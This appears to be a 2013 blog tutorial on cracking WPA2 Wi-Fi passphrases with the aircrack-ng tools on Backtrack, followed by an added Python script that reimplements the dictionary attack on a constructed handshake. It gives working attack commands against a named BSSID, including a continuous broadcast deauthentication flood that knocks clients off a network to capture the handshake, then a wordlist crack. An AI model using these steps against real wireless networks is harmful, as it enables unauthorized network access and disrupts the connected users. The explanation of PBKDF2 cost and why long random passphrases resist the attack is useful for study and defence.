Wednesday, July 24, 2013

How to crack WPA2 with Backtrack 5

     Wi-Fi Protected Access (WPA) and Wi-Fi Protected Access II (WPA2) are two security protocols and security certification programs developed by the Wi-Fi Alliance to secure wireless computer networks. The Alliance defined these in response to serious weaknesses researchers had found in the previous system, WEP (Wired Equivalent Privacy).
WPA (sometimes referred to as the draft IEEE 802.11i standard) became available in 2003. The Wi-Fi Alliance intended it as an intermediate measure in anticipation of the availability of the more secure and complex WPA2. WPA2 became available in 2004 and is a common shorthand for the full IEEE 802.11i (or IEEE 802.11i-2004) standard. 
    WPA2 has replaced WPA. WPA2, which requires testing and certification by the Wi-Fi Alliance, implements the mandatory elements of IEEE 802.11i. In particular, it introduces CCMP, a new AES-based encryption mode with strong security. Certification began in September 2004; from March 13, 2006, WPA2 certification is mandatory for all new devices to bear the Wi-Fi trademark. (source: Wikipedia)

In this post I want to share how to crack WPA2 with Backtrack. The tools I need are:
- a compatible Wi-Fi card (one whose driver supports monitor mode and packet injection)
- airmon-ng
- airodump-ng
- aireplay-ng
- aircrack-ng
- a wordlist

First, I use airmon-ng to put the card into monitor mode, which creates the monitor interface mon0. The command is "airmon-ng start wlan0". Check the output of airmon-ng: it tells you the name of the monitor interface, and it also lists processes (such as a running network manager) that can interfere with the capture.

Then I use airodump-ng to capture packets and write them to a capture file. First I run "airodump-ng mon0" to list the nearby access points with their BSSID (MAC address) and channel. Then I capture only the target network with "airodump-ng -w secureHotspot --bssid 78:47:1D:BC:2E:FB mon0". Adding -c with the channel shown for the target keeps the card on that channel instead of hopping, which otherwise can make it miss the handshake. With this -w prefix the capture is written to secureHotspot-01.cap.


After that, I use aireplay-ng to send deauthentication frames to the broadcast address, so that connected clients drop off and reconnect, performing the WPA2 4-way handshake that airodump-ng then captures. The command is "aireplay-ng -0 0 -a 78:47:1D:BC:2E:FB mon0". The 0 after -0 means keep sending deauths until stopped, so stop it (Ctrl+C) as soon as the airodump-ng window shows "WPA handshake: 78:47:1D:BC:2E:FB" in its top right corner; only the handshake is needed, not more traffic. A client must be connected to the network, otherwise there is nobody to deauthenticate and no handshake will ever appear.


And the last step is to crack the WPA2 passphrase from the captured handshake with aircrack-ng and the wordlist: "aircrack-ng -w wordlist.txt secureHotspot-01.cap", where wordlist.txt is whatever wordlist you have. aircrack-ng derives a key from every word in the list and checks it against the handshake; it refuses to start if the capture contains no handshake, and it only succeeds if the real passphrase is in the wordlist, which is why a long random passphrase defeats this attack.
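To make clear what aircrack-ng is actually doing in that last step, and why the handshake is required, here is an added Python example (not code from the original post or from the aircrack-ng project) that performs the same dictionary attack on a constructed WPA2 handshake. The SSID and BSSID are the ones from the steps above; the client MAC, both nonces, the EAPOL frame and the passphrase are made-up values, and the "captured" frame is produced by the script itself from the known passphrase so that the whole thing runs offline. Only Python's standard library is used.

```python
import hashlib
import hmac

# --- Constructed handshake parameters (not from a real capture) -------------
# SSID and BSSID follow the tutorial above; the client MAC, both nonces and the
# EAPOL frame are made-up but structurally valid values.
SSID = b"secureHotspot"
AP_MAC = bytes.fromhex("78471DBC2EFB")        # BSSID from the airodump-ng step
CLIENT_MAC = bytes.fromhex("001122334455")    # hypothetical station MAC
ANONCE = bytes(range(0x10, 0x30))             # 32-byte AP nonce (message 1/3)
SNONCE = bytes(range(0x60, 0x80))             # 32-byte station nonce (message 2)


def pmk_from_passphrase(passphrase: bytes, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 256 bits).

    The 4096 rounds are what slows a dictionary attack down; the SSID is the
    salt, which is why precomputed tables only work for one SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF-n: concatenate HMAC-SHA1(key, label||0x00||data||i)."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def ptk_from_pmk(pmk, ap_mac, client_mac, anonce, snonce) -> bytes:
    """PTK (384 bits for CCMP). Only its first 16 bytes, the KCK, matter here."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


def build_eapol_msg2(snonce: bytes, mic: bytes = bytes(16)) -> bytes:
    """EAPOL-Key frame for handshake message 2, key descriptor version 2 (WPA2).

    Key data carries a constructed RSN IE (CCMP pairwise/group, PSK AKM)."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
    body = (b"\x02"                            # descriptor type: RSN
            + b"\x01\x0a"                      # key info: MIC set, pairwise, version 2
            + b"\x00\x00"                      # key length
            + (1).to_bytes(8, "big")           # replay counter
            + snonce
            + bytes(16) + bytes(8) + bytes(8)  # key IV, key RSC, key ID (all zero)
            + mic
            + len(rsn_ie).to_bytes(2, "big") + rsn_ie)
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v2, EAPOL-Key


MIC_OFFSET = 4 + 1 + 2 + 2 + 8 + 32 + 16 + 8 + 8  # = 81, byte offset of the MIC field


def split_mic(frame: bytes):
    """Return (MIC found in the frame, frame with the MIC field zeroed)."""
    mic = frame[MIC_OFFSET:MIC_OFFSET + 16]
    return mic, frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]


def eapol_mic(kck: bytes, zeroed_frame: bytes) -> bytes:
    """WPA2 MIC: HMAC-SHA1 over the whole EAPOL frame, truncated to 128 bits.
    (WPA/TKIP, descriptor version 1, uses HMAC-MD5 instead.)"""
    return hmac.new(kck, zeroed_frame, hashlib.sha1).digest()[:16]


def mic_for_candidate(passphrase: bytes, zeroed_frame: bytes) -> bytes:
    """Passphrase -> PMK -> PTK -> KCK -> MIC, exactly what the station computed."""
    pmk = pmk_from_passphrase(passphrase, SSID)
    ptk = ptk_from_pmk(pmk, AP_MAC, CLIENT_MAC, ANONCE, SNONCE)
    return eapol_mic(ptk[:16], zeroed_frame)


def dictionary_attack(captured_frame: bytes, wordlist):
    """What aircrack-ng -w does per word: recompute the MIC of the captured
    message 2 and compare it with the MIC the client put in the frame."""
    captured_mic, zeroed = split_mic(captured_frame)
    for word in wordlist:
        if hmac.compare_digest(mic_for_candidate(word, zeroed), captured_mic):
            return word
    return None


# Simulated capture: the station knew the real passphrase and signed message 2.
TRUE_PASSPHRASE = b"letmein2013"
CAPTURED_FRAME = build_eapol_msg2(
    SNONCE, mic_for_candidate(TRUE_PASSPHRASE, build_eapol_msg2(SNONCE)))

# Constructed mini wordlist; a real one is millions of lines.
WORDLIST = [b"password", b"12345678", b"secureHotspot", b"letmein2013", b"qwerty123"]

if __name__ == "__main__":
    print("recovered passphrase:", dictionary_attack(CAPTURED_FRAME, WORDLIST))
```

The attack needs everything that goes into the PTK (both MAC addresses and both nonces) plus one MIC to check against, which is why the capture must contain the 4-way handshake and why plain data traffic is useless here. Each candidate costs 4096 HMAC-SHA1 iterations plus a few more for the PTK and MIC, so wordlist size, not cleverness, decides whether this succeeds.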